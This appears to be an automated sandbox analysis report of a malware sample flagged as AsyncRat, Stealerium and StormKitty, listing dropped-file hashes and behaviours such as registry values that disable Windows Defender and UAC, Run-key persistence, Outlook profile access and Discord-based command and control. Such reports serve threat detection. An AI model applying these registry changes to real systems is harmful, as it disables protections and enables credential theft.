| SHA512 | 51e3cfd517416c0e83f118c3a951c0cb703f0109c69720a444b20a7f7f8218912218183259be85ec9d0363bcd9d143f7ddb962e9581322427821d5109060b9d0 |
C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\Admin@RIJTOOVX_en-US\System\Process.txt
| MD5 | 383d8c66bc8ed75a7b6d3e10ff70e7e8 |
| SHA1 | e1fbed1bfbc386f4398e0b223b3c2ba7a8e60cef |
| SHA256 | 7245d614086025477a0025c33923dac068558f504d79e2e9625fbab171e3b060 |
| SHA512 | dd18179f343ee20220086553b30d936a887be497b11e7b3278f95869ec618726cbc53a196b94906a05e29601ab2ce6452aa6709fb48535a55cd2cebecaad9223 |
C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\Admin@RIJTOOVX_en-US\System\Process.txt
| MD5 | 1763796657c4821f7da65cd58958fe5e |
| SHA1 | f22c4574278b832b06acc57e08b844830c6c0b50 |
| SHA256 | 074b0d200f0f818ca63753baa4c9d2474efe615fc2f738e648edf24897a0049e |
| SHA512 | 738fa5b41375338fb1a167ca544ca06d7d64ed55665dd19e5c67b90bf68ef19cc4bee83e9dd7d900d1a6aa8cfe6d5a239750e89c976109bfc7454ac04669bd8c |
C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\Admin@RIJTOOVX_en-US\System\Process.txt
| MD5 | 42bfb8614c9596871c1f6a437f650c32 |
| SHA1 | a394d287f010374b39450e1cd32769d9c2c0d01d |
| SHA256 | c8d52921e5ca76b97b475fdf3d0eaa8032be769547f94eaecdc428588d5b34b3 |
| SHA512 | 75e87dd12c81e75e795d13a4b262d13e146dcbd43a380ab296d8801639feab860c2bb14e711ce3bc9e83d7f39d675d36ca55443d66978ebf70a23cd079b51dee |
C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\Admin@RIJTOOVX_en-US\System\Process.txt
| MD5 | 0299f7801f4eceda24a77d57b342c108 |
| SHA1 | eb1895fd738ee4f4a000eecad5a7cc1f965db743 |
| SHA256 | 598d702e6795325ecef334cdeca85d4213701bf3471895216224940b117f6f49 |
| SHA512 | 215655bc14ab1fc20b727699b521fd86533ed067f87f550ac3331f9c773528efa11322754b882db27dba8f06856de526936af9a4c56a898106fa53396e3f757f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
memory/3864-462-0x000000001C400000-0x000000001C47A000-memory.dmp
memory/3864-505-0x000000001C520000-0x000000001C5A4000-memory.dmp
C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\msgid.dat
| MD5 | cfcd208495d565ef66e7dff9f98764da |
| SHA1 | b6589fc6ab0dc82cf12099d1c2d40ab994e8410c |
| SHA256 | 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 |
| SHA512 | 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99 |
C:\Users\Public\SSSS.log
| MD5 | 92ffc7990c74845bcd0896e7632509e2 |
| SHA1 | c15233e1a6428991fcab1f35da144f2cde30d4e3 |
| SHA256 | 1518f9c6553e3d55482431c56892c142e4e87948d6f557f91528eb57ec3456f6 |
| SHA512 | e200a8abfdf470ac25f8e3fb7cb6f3def297ad0020dfe61ba5704a33eba8b7bd4cd2a55c17c14af46573be794b41dbb2e6bae0ed68d80a5e37f0183ab2a89a93 |
memory/4300-621-0x000000001BFA0000-0x000000001C052000-memory.dmp
memory/4300-742-0x000000001C6A0000-0x000000001C828000-memory.dmp
memory/4300-749-0x000000001B1A0000-0x000000001B1AA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp556F.tmp.dat
| MD5 | 8f5942354d3809f865f9767eddf51314 |
| SHA1 | 20be11c0d42fc0cef53931ea9152b55082d1a11e |
| SHA256 | 776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea |
| SHA512 | fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218 |
C:\Users\Admin\AppData\Local\Temp\tmp5583.tmp.dat
| MD5 | b01182fd0bcfecd25f0378b6ddd50714 |
| SHA1 | faf0abd8ccde904e4ec90d216f9dada2c3a046d3 |
| SHA256 | 921d4d81de816c9f7add02a5c5dc28209959a2ce1bdd64eff6675a5cdbd90a55 |
| SHA512 | a409fe0c1fbbcc158d47f6f727446ddf754b99ec235715f5f03b66a4f0c91b93c8bbd9e7ab235ed65e9b0abdd4bf2899dd3e5ec4afa8f45822e6f3dbc9d1bd7d |
C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\Admin@RIJTOOVX_en-US\Directories\Startup.txt
| MD5 | 68c93da4981d591704cea7b71cebfb97 |
| SHA1 | fd0f8d97463cd33892cc828b4ad04e03fc014fa6 |
| SHA256 | 889ed51f9c16a4b989bda57957d3e132b1a9c117ee84e208207f2fa208a59483 |
| SHA512 | 63455c726b55f2d4de87147a75ff04f2daa35278183969ccf185d23707840dd84363bec20d4e8c56252196ce555001ca0e61b3f4887d27577081fdef9e946402 |
C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\Admin@RIJTOOVX_en-US\Directories\OneDrive.txt
| MD5 | 966247eb3ee749e21597d73c4176bd52 |
| SHA1 | 1e9e63c2872cef8f015d4b888eb9f81b00a35c79 |
| SHA256 | 8ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e |
| SHA512 | bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa |
C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\Admin@RIJTOOVX_en-US\System\Process.txt
| MD5 | bcf28ad00abeb35eee9aa2dbf34f2176 |
| SHA1 | 0c340eb04f9e076d9ca5b0b6a78b412f6b12cc69 |
| SHA256 | 6b61adae52bda65bc9a6b75a22e92198b35b752067e70197add4ba2cb422549c |
| SHA512 | 36194c451b37876eba28744af713de65e5badd80c79cc2577650e6ed84b5f2bde5f15f8e3790a796b57c0286e87269212f6dcdab8ff6fe11407078ef2258ae32 |
C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\Admin@RIJTOOVX_en-US\System\Process.txt
| MD5 | e1c6adc65ef4ba5cfcb166f19954efae |
| SHA1 | fedeba2d590948c6493aee09a352655a9a3f2db1 |
| SHA256 | a46d56fead8f9e7caadd22a9c39b45eaea07e1e267fe1b07c13543349d08057a |
| SHA512 | f444f19d47abb2fffb907ba560662298d8ed37029eada2f319437362368c9cb4bd0ea608a2e2500c350c5365691909edb02f177706c7d9e27048ba9476a29938 |
C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\Admin@RIJTOOVX_en-US\System\Process.txt
| MD5 | e6031fc0dfd84ce7b161d4a5ef3b4846 |
| SHA1 | db5ff7134c86e0d686887fa321876ac726a28e21 |
| SHA256 | c38f7a1648f35d956be187b2b775429b894deaf6caab56361b33664bd51063f1 |
| SHA512 | 4d3e33a444d585ea9bfa243f1b14cdcfe51574faa27206068917022ada7e2ee349e697fdd7ab6a9835b83ebb311e144e5a583d34acc890fc1eb741b1e159075f |
C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\Admin@RIJTOOVX_en-US\System\ProductKey.txt
| MD5 | 71eb5479298c7afc6d126fa04d2a9bde |
| SHA1 | a9b3d5505cf9f84bb6c2be2acece53cb40075113 |
| SHA256 | f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3 |
| SHA512 | 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd |
C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\Admin@RIJTOOVX_en-US\Browsers\Mozilla\Firefox\Bookmarks.txt
| MD5 | 2e9d094dda5cdc3ce6519f75943a4ff4 |
| SHA1 | 5d989b4ac8b699781681fe75ed9ef98191a5096c |
| SHA256 | c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142 |
| SHA512 | d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7 |
C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\Admin@RIJTOOVX_en-US\System\Desktop.jpg
| MD5 | 33f8252f1a80aa7db228cfed8fb0ddd1 |
| SHA1 | 9fa0f358d608bcd64b4040e2995cff03fd4c2771 |
| SHA256 | 0715af0be6995d74b017192602aea3e50d58b49c3b32a7db9240277f9442fbe0 |
| SHA512 | b806a77ca06c74ee8724ac584876080ce0ac2109de7826f99b2e778cd77ae86be3bfd39920df3fe8d2b6794fd1259eb61211e47d511caf254c5a01c176ff07f1 |
C:\Users\Admin\AppData\Local\306d772a6fac68fb1540ec1a392a5c5a\Admin@RIJTOOVX_en-US\System\Windows.txt
| MD5 | 6450d0e56fe8a9b6ac09c875370dae0d |
| SHA1 | ed63ea15d9dae8fce7480b9fa027c076dcc0d392 |
| SHA256 | 7f35aba59494fed8dc66f460e57ee18c0f3d7a4067d44044fb662ce31007ff79 |
| SHA512 | ac32fcec88e54c99103df45dcf78443ad4607ff44800d0020aed704d484cee221754e054130500087a020d314d40cbf2a230dd3905816c79bd7f54126cd77067 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-23 11:06
Reported
2024-05-23 11:08
Platform
win11-20240426-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
AsyncRat
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
Stealerium
StormKitty
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1408 created 688 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\lsass.exe |
| PID 3600 created 688 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\lsass.exe |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Infected.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\WinDefend.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Windows\CurrentVersion\Run\YourAppName = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinDefend.exe" | C:\Users\Admin\AppData\Local\Temp\WinDefend.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api64.ipify.org | N/A | N/A |
| N/A | api64.ipify.org | N/A | N/A |
| N/A | icanhazip.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
